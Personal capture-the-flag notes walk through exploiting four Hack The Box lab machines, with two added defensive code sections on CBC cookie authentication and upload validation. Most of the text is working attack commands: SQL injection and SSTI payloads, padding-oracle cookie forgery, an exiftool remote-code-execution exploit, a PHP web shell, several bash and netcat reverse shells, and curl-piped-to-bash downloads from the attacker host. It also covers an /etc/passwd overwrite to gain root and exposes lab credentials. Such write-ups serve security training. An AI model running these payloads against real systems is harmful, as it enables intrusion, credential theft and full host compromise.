Cybersecurity

«Capture the flag»

In computing, a CTF is a cybersecurity challenge or a penetration test in which competitors must exploit a vulnerability in a system or application, or gain access to a computer system, in order to verify and report those vulnerabilities.

Tutorials

Hack The Box machines

#IPs [ HTB: 10.10.15.138 ; Overflow: 10.10.11.119 ]

#Ping => ping -c 1 10.10.11.119 => ttl=63 => LINUX machine

#Nmap 1. nmap -p- --open -vvv -n -Pn -sS --min-rate 5000 10.10.11.119 -oG allPorts 2. nmap -p22,25,80 -sCV 10.10.11.119 -oN targeted

#Info-web whatweb 10.10.11.119 -v nmap --script http-enum -p80 10.10.11.119 -oN webScan

#Launchpad OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 => Bionic Apache httpd 2.4.29 launchpad => Bionic

#Virtual hosting (Copyright © Overflow.HTB 2021) nano /etc/hosts => 10.10.11.119 overflow.htb

#Fuzzing (seclists) wfuzz -c --hc=404 -t 200 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt http://overflow.htb/FUZZ.php => "index", "register", "login", "logout"

#Test injection on the form: admin admin ; admin' ; admin' or 1=1-- - ; admin' or sleep(5)-- - ; admin and sleep(5)-- - (Invalid credentials)

#Inspect web (cookies, CBC = block cipher) storage cookie => auth = DJEQmvMcbastY%2BR9ff%2FUYSuCvbh2Kkat

#Padbuster (padding oracle attack) -> decrypt : padbuster http://10.10.11.119/home/index.php DJEQmvMcbastY%2BR9ff%2FUYSuCvbh2Kkat -cookies "auth=DJEQmvMcbastY%2BR9ff%2FUYSuCvbh2Kkat" 8 -> encrypt : padbuster http://10.10.11.119/home/index.php DJEQmvMcbastY%2BR9ff%2FUYSuCvbh2Kkat -cookies "auth=DJEQmvMcbastY%2BR9ff%2FUYSuCvbh2Kkat" 8 -plaintext user=admin [+] Encrypted value is: BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA

#Alternative: Burpsuite (bit flipper -> cookie hijacking) Register : bdmin -> send to intruder -> payloads (bit flipper (CBC)) -> start attack -> check length (bdim => check the first bytes) 12696 -> 12712 => Cookie hijacking (meHq7KpnHo5NtAFF01qlmZE8GECiIYkB) => Admin Panel (Log in to CMS Made Simple = http://10.10.11.119/admin_cms_panel/admin/login.php)
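The padding oracle and bit-flipper steps above both work because the auth cookie is CBC ciphertext with no integrity check. The following is an added example, not code from the notes or from the target CMS: a toy CBC implementation shows why a flipped ciphertext byte silently changes the decrypted cookie (bdmin -> admin), and how an HMAC over IV and ciphertext, verified before any decryption, removes both the malleability and the padding oracle. The block cipher is a constructed Feistel stand-in, not AES; the key, IV and cookie contents are made up.

```python
import hashlib
import hmac
import os

BLOCK = 8  # same block size the notes pass to padbuster


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _round(key: bytes, half: bytes, rnd: int) -> bytes:
    # Keyed round function for the toy cipher, truncated to half a block.
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[: BLOCK // 2]


def block_encrypt(key: bytes, block: bytes) -> bytes:
    # Constructed 4-round Feistel block cipher: a stand-in for AES, not a real cipher.
    left, right = block[: BLOCK // 2], block[BLOCK // 2 :]
    for rnd in range(4):
        left, right = right, _xor(left, _round(key, right, rnd))
    return left + right


def block_decrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[: BLOCK // 2], block[BLOCK // 2 :]
    for rnd in reversed(range(4)):
        left, right = _xor(right, _round(key, left, rnd)), left
    return left + right


def pkcs7_pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def pkcs7_unpad(data: bytes) -> bytes:
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")  # this distinct error is what a padding oracle leaks
    return data[:-n]


def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    data, out, prev = pkcs7_pad(plaintext), b"", iv
    for i in range(0, len(data), BLOCK):
        prev = block_encrypt(key, _xor(data[i : i + BLOCK], prev))
        out += prev
    return iv + out  # IV is shipped in front of the ciphertext, as the cookie does


def cbc_decrypt(key: bytes, blob: bytes) -> bytes:
    iv, ct = blob[:BLOCK], blob[BLOCK:]
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        out += _xor(block_decrypt(key, ct[i : i + BLOCK]), prev)
        prev = ct[i : i + BLOCK]
    return pkcs7_unpad(out)


def flip_byte(blob: bytes, index: int, delta: int) -> bytes:
    # Tamper with one ciphertext byte; in CBC this XORs the same byte of the next plaintext block.
    b = bytearray(blob)
    b[index] ^= delta
    return bytes(b)


def _mac_key(key: bytes) -> bytes:
    # Separate MAC key derived from the cipher key (assumed scheme for this example).
    return hashlib.sha256(b"cookie-mac" + key).digest()


def seal_cookie(key: bytes, plaintext: bytes) -> bytes:
    # Encrypt-then-MAC: the tag covers IV and ciphertext, so any flipped byte is detected.
    blob = cbc_encrypt(key, os.urandom(BLOCK), plaintext)
    return blob + hmac.new(_mac_key(key), blob, hashlib.sha256).digest()


def open_cookie(key: bytes, sealed: bytes):
    blob, tag = sealed[:-32], sealed[-32:]
    expected = hmac.new(_mac_key(key), blob, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, tag):
        return None  # one uniform failure before decryption: no padding oracle to query
    return cbc_decrypt(key, blob)


if __name__ == "__main__":
    key, iv = b"k" * 16, bytes(range(BLOCK))  # constructed values
    weak = cbc_encrypt(key, iv, b"user=bdmin")
    print(cbc_decrypt(key, flip_byte(weak, 5, ord("b") ^ ord("a"))))  # b'user=admin'
    strong = seal_cookie(key, b"user=bdmin")
    print(open_cookie(key, flip_byte(strong, 5, ord("b") ^ ord("a"))))  # None
```

The unauthenticated cookie decrypts the tampered value without complaint because only the IV was changed; the sealed cookie rejects it before the padding is ever examined, which is the property the padbuster step relies on being absent.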

#Test access from the terminal with curl: curl -s -X GET http://10.10.11.119/admin_cms_panel/admin/login.php | html2text

#Search for CMS Made Simple vulnerabilities (exploitdb) searchsploit cms made simple ; find the version -> fuzz directories http://10.10.11.119/admin_cms_panel/FUZZ => "doc" -> / "CHANGELOG.txt" => Version 2.2.8 searchsploit cms made simple 2.2. => SQL Injection , (Authenticated) Remote Code Execution , etc searchsploit -x php/webapps/46635.py => view the script (SQL Injection) => dump_salt(), dump_username(), dump_email(), dump_password() => crack_password() SALT = from+cms_siteprefs+where+sitepref_value searchsploit -m php/webapps/46635.py (copy to .); mv 46635.py sqli.py ; python3 sqli.py ; (does not accept python3)

#Logs => inspect (Q) => src=/config/admin_last_login.js => http://10.10.11.119/config/admin_last_login.js async function getUsers() { let url = 'http://overflow.htb/home/logs.php?name=admin' } => Unauthorized!! Same page, carrying the cookie over => 10.10.11.119/home/logs.php?name=admin => Last login : 16:00:00 Functional server (req,res) => name=admin') or 1=1-- -

#SQL ordering name=admin') order by 100-- - ; Find columns => order by 3-- - ; union select 1,2,3-- - ; union select 1,2,database()-- - ; version() ; user() ; load_file("/etc/passwd"); echo -n "/etc/passwd" | xxd => 0x2f6574632f706173737764 limit 0,1-- - ; union select 1,2,schema_name from information_schema.schemata-- - ; union select 1,2,table_name from information_schema.tables where table_schema="cmsmsdb"-- - ; + limit 11,1-- - (limit the output)

#enumDB script (see cd /exploits/enumdb.sh)

#Credentials (see cd /content/credentials.txt)

#Crack passwords hashid c6c6b9310e0e6f3eb3ffeb2baff12fdd => [+] MD2 hash-identifier => [+] MD5 ; locate rockyou.txt ; john -w:/usr/share/seclists/Passwords/Leaked-Databases/rockyou-75.txt credentials.txt

#Vulnerable CMS Made Simple (salt => database => ') union select 1,2,sitepref_value from cmsmsdb.cms_siteprefs-- -) => /content/cmsSalt.txt

#crackPass script (see cd /exploits/crackPass.py) python3 crackPass.py => The password is alpha!@#$%bravo

#Test SSH access ssh editor@10.10.11.119 => Permission denied

#Access the authenticated panel (http://10.10.11.119/admin_cms_panel/admin/login.php) searchsploit cms made simple 2.2. => (Authenticated) RCE (remote code execution) => searchsploit -x php/webapps/49345.txt => navigate to Extensions->User Defined Tags

#Reverse Shell name : test , code : exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.15.138/443 0>&1'"); sudo nc -nlvp 443 => no access

#More vulnerabilities: important business message : "Make sure you check out devbuild-job.overflow.htb and report any UI related problems to devloper, use the editor account to authenticate."

#Add virtual host nano /etc/hosts => devbuild-job.overflow.htb ping -c 1 devbuild-job.overflow.htb credential reuse => editor:alpha!@#$%bravo => account ; upload resume ; tiff/jpeg/jpg format

#Upload malicious file pushd /home/vleon/Downloads -> download cat.jpg -> kitty +kitten icat cat.jpg -> upload -> http://devbuild-job.overflow.htb/home/profile/index.php?upload=0 touch cmd.php (view the system-call code in /exploits) ; File type not supported ;

#File magic numbers file cmd.php ; file cat.jpg ;

#Catch the upload route with Burpsuite (req,res) => ../../assets/data/upliid => ExifTool (metadata reader) => ./exiftool /home/vleon/Desktop/vleon/htb/Overflow/exploits/cat.jpg File Name : 625318165bf3d0.40501954.jpg Directory : ../../assets/data/upliid -> ./exiftool cat.jpg -> inject metadata -> ./exiftool -Comment="<?php system('whoami'); ?>" cat.php.jpg
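The "File type not supported" rejection, the magic-number check and the exiftool -Comment injection above are the three things an upload handler has to get right. The following is an added example, not code from the notes or from the target site: a small Python validator (function names and the minimal JPEG builder are assumptions made here) that checks the extension against an allow-list, rejects double extensions such as cat.php.jpg, compares the declared extension with the real magic number, and walks the JPEG metadata segments looking for script tags in COM/APP1 comments.

```python
import struct

# Magic numbers for the formats the upload form accepts (tiff/jpeg/jpg per the notes).
MAGIC = [
    (b"\xff\xd8\xff", "jpeg"),
    (b"II*\x00", "tiff"),
    (b"MM\x00*", "tiff"),
]
EXT_TO_TYPE = {"jpg": "jpeg", "jpeg": "jpeg", "tif": "tiff", "tiff": "tiff"}
METADATA_MARKERS = {0xFE, 0xE1}  # COM (what exiftool -Comment writes) and APP1/Exif
SCRIPT_HINTS = (b"<?", b"<script")


def sniff_type(data: bytes):
    """Return the format implied by the leading bytes, or None if it is not a known image."""
    for sig, kind in MAGIC:
        if data.startswith(sig):
            return kind
    return None


def jpeg_segments(data: bytes):
    """Walk the JPEG marker segments before the entropy-coded data, yielding (marker, payload)."""
    pos = 2  # skip SOI
    while pos + 4 <= len(data) and data[pos] == 0xFF:
        marker = data[pos + 1]
        if marker in (0xD9, 0xDA):  # EOI or SOS: no more metadata segments
            return
        (length,) = struct.unpack(">H", data[pos + 2 : pos + 4])
        yield marker, data[pos + 4 : pos + 2 + length]
        pos += 2 + length


def validate_upload(filename: str, data: bytes) -> list:
    """Return the list of reasons to reject the upload; an empty list means accept."""
    reasons = []
    parts = filename.lower().split(".")
    if len(parts) > 2:
        reasons.append("double extension")
    ext = parts[-1] if len(parts) > 1 else ""
    if ext not in EXT_TO_TYPE:
        reasons.append("extension not allowed")
    kind = sniff_type(data)
    if kind is None:
        reasons.append("unknown magic number")
    elif ext in EXT_TO_TYPE and EXT_TO_TYPE[ext] != kind:
        reasons.append("extension does not match content")
    if kind == "jpeg":
        for marker, payload in jpeg_segments(data):
            if marker in METADATA_MARKERS and any(h in payload.lower() for h in SCRIPT_HINTS):
                reasons.append("script tag in metadata segment")
                break
    return reasons


def build_jpeg(comment: bytes = b"") -> bytes:
    """Constructed minimal JPEG (SOI, optional COM segment, EOI): enough for the checks above."""
    body = b"\xff\xd8"
    if comment:
        body += b"\xff\xfe" + struct.pack(">H", len(comment) + 2) + comment
    return body + b"\xff\xd9"


if __name__ == "__main__":
    print(validate_upload("cat.jpg", build_jpeg(b"holiday photo")))            # []
    print(validate_upload("cat.php.jpg", build_jpeg(b"<?php echo 1; ?>")))     # two reasons
    print(validate_upload("cmd.php", b"<?php echo 1; ?>"))                     # two reasons
```

Two design notes: the stored name should be server-generated (the notes show the site already renaming the file to 625318165bf3d0.40501954.jpg) and the upload directory should not be served with PHP execution enabled, so a renamed script cannot run even if every content check is fooled. Content checks also do nothing against the exiftool DjVu parser bug used further on in these notes; that one is fixed only by updating exiftool past the affected range (7.44 to 12.23 per the notes).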

#Exiftool 11.92: search for the exploit on GitHub, versions 7.44 to 12.23 have a BUG in the DjVu code (code execution) ; git clone https://github.com/OneSecCyber/JPEG_RCE ; ./exiftool -config eval.config runme.jpg -eval='system("ping -c 1 10.10.15.138")' tcpdump -i tun0 icmp -n ; upload runme.jpg => "10.10.11.119 > 10.10.15.138: ICMP echo request" ;

#Inject reverse shell -eval='system("curl 10.10.15.138 | bash")' ; nvim index.html (reverse shell in /exploits) ; python3 -m http.server 80 ; upload file <->

#TTY treatment script /dev/null -c bash , Ctrl+z , stty raw -echo; fg , reset xterm , export TERM=xterm, echo $SHELL , export SHELL=bash stty size => 46 174 , stty rows 46 columns 174

#Find flags find / -name user.txt 2>/dev/null ; cat user.txt -> Permission denied ; ls -l ;

#User pivoting (www-data, developer, tester, root) cd /var/www/html/config/ , cat db.php -> mysqli_connect => ("localhost","developer", "sh@tim@n","Overflow") ; su developer , pass = sh@tim@n , ssh developer@10.10.11.119 sh@tim@n, cd tester, id 1002(network) , cd / , find / -group network 2>/dev/null , /etc/hosts , cd /opt/ (enumerate the system) , cat commontask.sh -> "#make sure its running every minute." - bash < <(curl -s http://taskmanage.overflow.htb/task.sh) ,

#DNS hijacking -> nvim task.sh (view the bash script in /exploits), sudo python3 -m http.server 80 ; developer nano /etc/hosts 10.10.15.138 taskmanage.overflow.htb ; nc -nlvp 443 -> tester , cat user.txt => e40b0ea8144c06797196192d7cf4852e , cd /root/ -> Permission denied , cd /opt/, ls -la , cd file_encrypt ,

#Root escalation (SUID binaries) find / -perm -4000 2>/dev/null , ./file_encrypt => This is the code 1804289383. Enter the Pin: "" , file file_encrypt -> setuid ELF 32-bit LSB , uname -a -> x86_64 GNU, Code static , Pin : 1234, aaaa x 80 (test for buffer overflow) => Wrong Pin , mkdir binary -> nc -nlvp 443 > file_encrypt (save input in this file) <-> tester: nc 10.10.15.138 443 < file_encrypt ; validate the data transfer -> md5sum file_encrypt (compare the hash) ; chmod +x file_encrypt (execute permission) ; file file_encrypt ; checksec file_encrypt ; cat /proc/sys/kernel/randomize_va_space => 0 (ASLR / Address Space Layout Randomization disabled) ; ldd file_encrypt | grep libc ltrace ./file_encrypt -> puts("Wrong Pin") ; strace (more verbose) ; strings file_encrypt

#Ghidra (SRE developed by the NSA, binary disassembler) ghidra , disown , new project (view /binary), find what the PIN is compared against, LC_ALL=en_US.UTF-8 gdb ./file_encrypt -> gef info functions => check_pin ; select variable , press L , rename , double-click -> go to function , random PIN (static for loop), pinCode.c (view code in /binary) , gef> disas random ; returns the PIN comparison with xor (^ comparison) ; gef> break *random+57 ; r => run program ; nvim generatePIN.py -> script of the process (/binary) Pin long => to int -> -202976456 , name : AAAAAx222 => segmentation fault (buffer overflow)

#Buffer overflow find offset : AAAA x ??? -> to overwrite registers -> A = 41 (hexadecimal) EIP = Instruction Pointer ("AAAA") 0x41... => gef> pattern create => [+] Saved as '$_gef0' => r => inject pattern => look at EIP => pattern offset $eip => Found at offset 44 python -c 'print("A"*44 + "B"*4);' => EIP = "BBBB" -> 0x42424242 ; checksec -> data execution prevention (EIP addressing cannot be changed) ; disas (disassemble) encrypt (another function that runs) ; program flow => f encrypt => address in little-endian format -> python -c 'print("A"*44 + "\x5b\x58\x55\x56");' next function Enter Input File : /etc/passwd , Enter encrypted file : (check script /exploits/encrypter.py); pwd /opt/file_encrypt ; /tmp/ -> cp /etc/passwd file.txt python3 encrypt.py , cat file.encrypted , ls -l /opt/file_encrypt/ -> SUID binary / owner root , mv file.txt passwd , control of the output path the program writes to => openssl passwd : hola,hola -> b0mbzKMgcIO0o ; nano passwd -> root:x:0:0.. => root:b0mbzKMgcIO0o:0:0.. ; go back to ^ (decrypt) before dumping /etc/passwd python3 encrypt.py -> output_encrypted_file = "/tmp/passwd.encrypted" ; mv passwd.encrypted passwd ; Enter Input File: /tmp/passwd , Enter Encrypted File: /etc/passwd ; cat /etc/passwd -> root:b0mbzKMgcIO0o:0:0:root:/root:/bin/bash ; su root , password : hola ; flag: 075453c62ff67efdd50b4e975247ff60

# PING ping -c1 10.10.11.105 ttl=63 = LINUX ping -c1 10.10.11.105 -R

# NMAP nmap -p- --open -T5 -v -n 10.10.11.105 nmap -p- -sS --min-rate 5000 --open -vvv -n -Pn 10.10.11.105 -oG allPorts ./portDiscovery.sh

# PORT SERVICES nmap -sCV -p22,80 10.10.11.105 -oN targeted --- www --- Launchpad ( check versions ) whatweb 10.10.11.105 = no address

# /etc/hosts Add horizontall.htb to DNS resolution 10.10.11.105 nano /etc/hosts ping -c1 horizontall.htb

# Enumerate WEB services ( fuzzing ) whatweb 10.10.11.105 nmap --script http-enum -p80 horizontall.htb -oN webScan wfuzz -c -t 200 --hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt http://horizontall.htb/FUZZ

# View source code curl -s -X GET "http://horizontall.htb/" | bat -l html | grep -oP '".*?"' | grep app\. | sort -u

# Filter curl -s -X GET "http://horizontall.htb//js/app.c68eb462.js" | grep "\.htb" | bat -l html | grep -oP '".*?"' | grep http RESULT [SUBDOMAIN] = http://api-prod.horizontall.htb/reviews ADD TO /etc/hosts curl -s -X GET "http://api-prod.horizontall.htb/reviews" | jq

# Fuzz the API wfuzz -c -t 200 --hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt "http://api-prod.horizontall.htb/FUZZ" curl -s -X GET "http://api-prod.horizontall.htb/users" | jq curl -s -X GET "http://api-prod.horizontall.htb/Admin" = http://api-prod.horizontall.htb/admin/auth/login Filter by error codes and by word count wfuzz -c -t 200 --hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt "http://api-prod.horizontall.htb/admin/FUZZ" wfuzz -c -t 200 --hc=404 --hh=854 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt "http://api-prod.horizontall.htb/admin/FUZZ" curl -s -X GET "http://api-prod.horizontall.htb/Admin/init" | jq

# Exploits searchsploit "strapiVersion": "3.0.0-beta.17.4" searchsploit -m multiple/webapps/50239.py mv 50239.py strapi_ex.py python3 strapi_ex.py http://api-prod.horizontall.htb/

# Listen *tcpdump -i tun0 icmp -n ping -c1 10.10.14.159 *nc -nlvp 443 nc -e /bin/bash 10.10.14.159 443 bash -i >& /dev/tcp/10.10.14.159/443 0>&1 bash -c "bash -i >& /dev/tcp/10.10.14.159/443 0>&1" bash -c "bash -i >%26 /dev/tcp/10.10.14.159/443 0>%261" *python3 -m http.server 80 curl http://10.10.14.159/test nano index.html cd /Horizontall/exploits python3 -m http.server 80 cd / ; curl http://10.10.14.159 curl http://10.10.14.159/ | bash

# Victim machine hostname -I ifconfig = 10.10.11.105

# TTY treatment script /dev/null -c bash ctrl+z = suspended nc -nlvp 443 stty raw -echo; fg = continued nc -nlvp 443 reset xterm echo $TERM = dumb = export TERM=xterm echo $SHELL = sh = export SHELL=bash stty size = 24 80 = 52 189 = stty rows 52 columns 189 USER FLAG = 86318e9b1fae08287c589d9f7888acad

# Privilege escalation grep -r -i password = "password": "#J!:F9Zt2u" cat database.json = "username": "developer" = "client": "mysql" mysql -u developer -p show databases; use strapi; show tables; select * from strapi_administrator; = admin@horizontall.htb : $2a$10$rHlTpnQP4VCrTKPvBudaeOtQqNvdgb5Fm4YH9A0KeJKJLBE9QCKia which pkexec which pkexec | xargs ls -l which gcc make git clone https://github.com/berdav/CVE-2021-4034 zip -r comprimido.zip CVE-2021-4034/ python3 -m http.server 80 = wget http://10.10.14.159/comprimido.zip unzip comprimido.zip cd CVE-2021-4034 make ( compile ) ./cve-2021-4034 ( run ) whoami ; bash ; cd /root/ ; ls ; cat root.txt ROOT FLAG = 3d6a17b1e621e0442716e8019c62ca60

# Alternative escalation Look for SUID privileges = find / -perm -4000 2>/dev/null Cron jobs = cat /etc/crontab Open ports = netstat -nat curl localhost:8000 = Laravel v8 (exploitable) REMOTE PORT FORWARDING chisel = git clone ; cd chisel ; go build -ldflags "-s -w" . ; wget http://10.10.14.159/chisel ; chmod +x chisel ./chisel server --reverse -p 1234 ./chisel client 10.10.14.159:1234 R:8000:127.0.0.1:8000 nmap -p8000 --open -T5 -v -n 127.0.0.1 ( closed before and open once tunnelled) http://localhost:8000/ (OPEN) git clone ...laravel exploit python3 exploit.py http://127.0.0.1:8000 Monolog/RCE1 whoami python3 exploit.py http://127.0.0.1:8000 Monolog/RCE1 'ifconfig' cat index.html python3 -m http.server 80 nc -nlvp 443 python3 exploit.py http://127.0.0.1:8000 Monolog/RCE1 'curl http://10.10.14.159/ | bash'

#PING ping -c1 10.10.11.131 ttl=64 LINUX ping -c1 10.10.11.131 -R = Traceroute

#PORTS | xargs ... = chain commands which = locate tools echo $PATH = see the alternative PATH directories 65535 ports = 1 TCP ; 2 UDP nmap -p- --open -T5 -v -n 10.10.11.131 -nmap open ports, timing (1-5), verbose, no DNS

# nmap -p- -sS --min-rate 5000 --open -vvv -n -Pn 10.10.11.131 -oG allPorts -packets no slower than 5000 per second, triple v for more info and -Pn (no ARP, no DNS resolution) , export to a grepable file; right arrow to see the progress % cat allPorts # nmap -sCV -p22,80,111,3128,24007,49152,49153 10.10.11.131 -oN targeted -see the port services and export in nmap file format 22 - SSH, 80 - HTTP, .....

# whatweb 10.10.11.131 (-v) vi /etc/hosts 10.10.11.131 steampunk-era.htb - add the domain, go to http://steampunk-era.htb

# OpenSSL (49152) commonName=flustered.htb openssl s_client -connect 10.10.11.131:49152 -inspect the certificate ping flustered.htb vi /etc/hosts 10.10.11.131 flustered.htb ctrl+u view source code flustered.htb

# Proxy (3128) Squid http proxy 4.6 curl --proxy http://10.10.11.131:3128 http://127.0.0.1 - credentials needed lsof -i:80 service apache2 status

# Port (24007) GlusterFS ( NAS file system ) apt search glusterfs - search for packages involving gluster ( glusterfs-client, glusterfs-server ) apt install glusterfs-client glusterfs-server man gluster - see the parameters gluster --remote-host=10.10.11.131 volume list - vol1 and vol2

# Mount mount -t glusterfs 10.10.11.131:/vol1 /mnt/flustered mkdir /mnt/flustered cat /var/log/glusterfs/mnt-flustered.log - DNS resolution failed on host flustered add flustered to /etc/hosts 10.10.11.131 flustered - could not load our cert at /etc/ssl/glusterfs.pem ls /etc/ssl mount -t glusterfs 10.10.11.131:/vol2 /mnt/flustered cd !$ - to go to the last argument of the previous command ll - list ( mysql structure: mariaDb ) find / -name aria_log.00000001 2>/dev/null locate aria_log.00000001 strings mysql_upgrade_info 10.3.31-MariaDB ls mysql strings ibdata1

# Docker (create a container with the victim's MySQL version) apt install docker.io docker images cd /tmp - mkdir mysql - cd mysql - cp -R /mnt/flustered/* . (copy the victim's mount) watch -n 1 ls -l = to watch the downloads change docker run --name mariadb -v /tmp/mysql:/var/lib/mysql -d mariadb:10.3.31 (create container) docker exec -it mariadb bash (bash in the container)

# Mysql docker exec -it mariadb mysql docker stop mariadb docker ps ; docker ps -a -q ; docker rm c90c8b9f6487 ; Editing the config file to load the plugin : - docker run --name mariadb -v /tmp/mysql:/var/lib/mysql -v /tmp/socket.cnf:/etc/mysql/mariadb.conf.d/socket.cnf -d mariadb:10.3.31 show databases; use squid; show tables; select * from passwd; = lance.friedman | oWJ5-jD5^m3

# Proxy with credentials curl --proxy 'http://lance.friedman:oWJ5-jD5^m3@10.10.11.131:3128' http://127.0.0.1 # List routes (gobuster) gobuster dir --proxy 'http://lance.friedman:oWJ5-jD5^m3@10.10.11.131:3128' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --url http://127.0.0.1 *Error with special symbols* = convert to hex = man ascii = URL-encode ( = %3E ...) - [-- http://127.0.0.1/app/] + [-x py] = curl --proxy 'http://lance.friedman:oWJ5-jD5^m3@10.10.11.131:3128' http://127.0.0.1/app/app.py | bat -l py # Site hack (Flask = Server Side Template Injection) curl -s -X POST "http://10.10.11.131/" -H "Content-type: application/json" -d '{"siteurl":"caca"}' ; '{"siteurl":"9*9"}'

# Burpsuite (tunnelled) burpsuite &>/dev/null & curl -s -X POST "http://10.10.11.131/" -H "Content-type: application/json" -d '{"siteurl":"9*9"}' --proxy http://127.0.0.1:8080 - redirect to the burpsuite proxy ( Intercept - Repeater curl - SSTI ) # SSTI ( PayloadsAllTheThings ) tcpdump -i tun0 icmp -n ( listening on my machine ) \" - to escape the "" enclosure SEND PING from the victim to me curl -s -X POST "http://10.10.11.131/" -H "Content-type: application/json" -d '"siteurl": "% for x in ().__class__.__base__.__subclasses__() %% if \"warning\" in x.__name__ % x()._module.__builtins__[\"__import__\"](\"os\").system(\"ping -c1 10.10.14.163\"%endif%%endfor%"' GAIN ACCESS cd /home/vleon/Desktop/vleon/HTB/Flustered/content start a python server : python3 -m http.server 80 system(\"curl 10.10.14.163\") = 10.10.11.131 - - [16/Feb/2022 20:53:19] "GET / HTTP/1.1" 200 - nano index.html = "#!/bin/bash bash -i >& /dev/tcp/10.10.14.163/443 0>&1" nc -nlvp 443 - another listener system(\"curl 10.10.14.163 | bash\") ESCALATION whoami ; hostname -I ; which pkexec | xargs ls -l

# Shell treatment Pseudo-console = script /dev/null -c bash ctrl+z = suspend zsh stty raw -echo; fg = back to netcat reset xterm = reset the console echo $TERM = export TERM=xterm export SHELL=bash

# Investigate the machine hostname -I ; ls ; cd /home/ ; cd jennifer/ ; grep "sh$" /etc/passwd (see local users) FILE TRANSFER with NC (SSL) cd /etc/ssl nc -nlvp 443 > glusterfs.ca ( attacker ) nc 10.10.14.163 443 < glusterfs.ca ( victim ) umount /mnt/flustered mount -t glusterfs 10.10.11.131:/vol1 /mnt/flustered GENERATE SSH KEY cd /root/.ssh ssh-keygen ll .rw------- root root 2.5 KB Wed Feb 16 21:59:59 2022 id_rsa .rw-r--r-- root root 567 B Wed Feb 16 21:59:59 2022 id_rsa.pub - put id_rsa.pub into the victim's authorized_keys file cat id_rsa.pub | tr -d '\n' | xclip -sel clip echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQ.....' > authorized_keys ssh jennifer@10.10.11.131 (no password) jennifer flag - f9bf7cdb107c079f7b9f8bed3c7be950 find / -perm -4000 2>/dev/null = search for SUID permissions getcap -r / 2>/dev/null = list capabilities

# Find custom network ports which docker ; docker images ; docker ps ; hostname -I; touch hostDiscovery.sh chmod +x hostDiscovery.sh nmap -p- -sS --min-rate 5000 --open -vvv -n -Pn 172.17.0.1 nmap -sn 172.17.0.0/24 echo $? = 0 success, 1 failure nano portDiscovery.sh chmod +x portDiscovery.sh ./portDiscovery.sh curl http://172.17.0.1:111

#PING ping -c1 10.10.11.142 ttl=63 = LINUX ping -c1 10.10.11.142 -R = [Traceroute]

#NMAP nmap -p- -sS --min-rate 5000 --open -vvv -n -Pn 10.10.11.142 -oG allports nmap -p80 -sCV 10.10.11.142 -oN targeted

#Scan info whatweb 10.10.11.142 = WordPress 5.9 view-source:http://10.10.11.142:80

#Simple routes nmap --script http-enum -p80 10.10.11.142 -oN webScan /wp-login.php ping -c1 pressed.htb = nano /etc/hosts http://pressed.htb/wp-login.php admin = invalid password

#Test the web user inputs <script>alert("XSS")</script>

#Handle web requests curl -s -X GET "http://pressed.htb/" -H "User-Agent: caca" = Inspect web / Network / Request headers / User-Agent The User-Agent is DYNAMIC = change it to "caca"

#Test PHP injection curl -s -X GET "http://pressed.htb/" -H "User-Agent: <?php system('whoami'); ?>"

#WpScan wpscan --url "http://pressed.htb" XML-RPC seems to be enabled: http://pressed.htb/xmlrpc.php Upload directory has listing enabled: http://pressed.htb/wp-content/uploads/ Download the data = cd ../content ; mkdir wordpress; cd !$ ; wget -r http://pressed.htb/wp-content/uploads/ [!] http://pressed.htb/wp-config.php.bak [backup] curl -s -X GET "http://pressed.htb/wp-config.php.bak" tree | grep -v "index.html" rm -r pressed.htb/ #Three password attempts XML-RPC (remote tasks via POST) = http://pressed.htb/xmlrpc.php curl -s -X POST "http://pressed.htb/xmlrpc.php" | cat Send XML = curl -s -X POST "http://pressed.htb/xmlrpc.php" -d '<methodCall><methodName>system.listMethods</methodName><params></params></methodCall>' #Manage posts as admin pip3 install python-wordpress-xmlrpc python3 [interactive console] from wordpress_xmlrpc import Client from wordpress_xmlrpc.methods import posts client = Client("http://pressed.htb/xmlrpc.php", 'admin', 'uhc-jan-finals-2022') post = client.call(posts.GetPosts()) post ; dir(post[0]) ; (post[0]).link ; post[0].id .user .password .content wp:php-everywhere-block/php "code:JTNDJ...

#Base64 JTNDJ...= echo "JTNDJ...=" | base64 -d; echo nano data = <?php echo "<pre>" . shell_exec($_REQUEST['cmd']) . "<pre>"; ?> base64 -w 0 data; echo = PD9waHAgCgllY2hvICI8cHJlPiIgLiBzaGVsbF9leGVjKCRfUkVRVUVTVFsnY21kJ10pIC4gIjxwcmU+IjsKPz4K #URL-encode %3C%3Fphp%20%20echo(file_get_contents('%2Fvar%2Fwww%2Fhtml%2Foutput.log'))%3B%20%3F%3E php --interactive echo urldecode("%3C%3Fphp%20%20echo(file_get_contents('%2Fvar%2Fwww%2Fhtml%2Foutput.log'))%3B%20%3F%3E"); = "<?php echo(file_get_contents('/var/www/html/output.log')); ?>" #Insert the data variables to build a fake shell post[0] ; malicious_post = post[0] ; malicious_post ; malicious_post.content = 'content + base64 string CMD' client.call(posts.EditPost(malicious_post.id, malicious_post)) /?cmd=whoami = append to the url = www-data [victim machine] http://pressed.htb/index.php/2022/01/28/hello-world/?cmd=id # Python and bash scripts cd /content apt install rlwrap nano fakeshell.sh chmod +x fakeshell.sh rlwrap ./fakeshell.sh

# Privileges pwd /var/www/html cd ../; pwd /var/www ls -l /home/htb cat /home/htb/user.txt = USERFLAG = b1bee9b0ac51d0b85e96526638050c58 uname -a lsb_release -a iptables -L

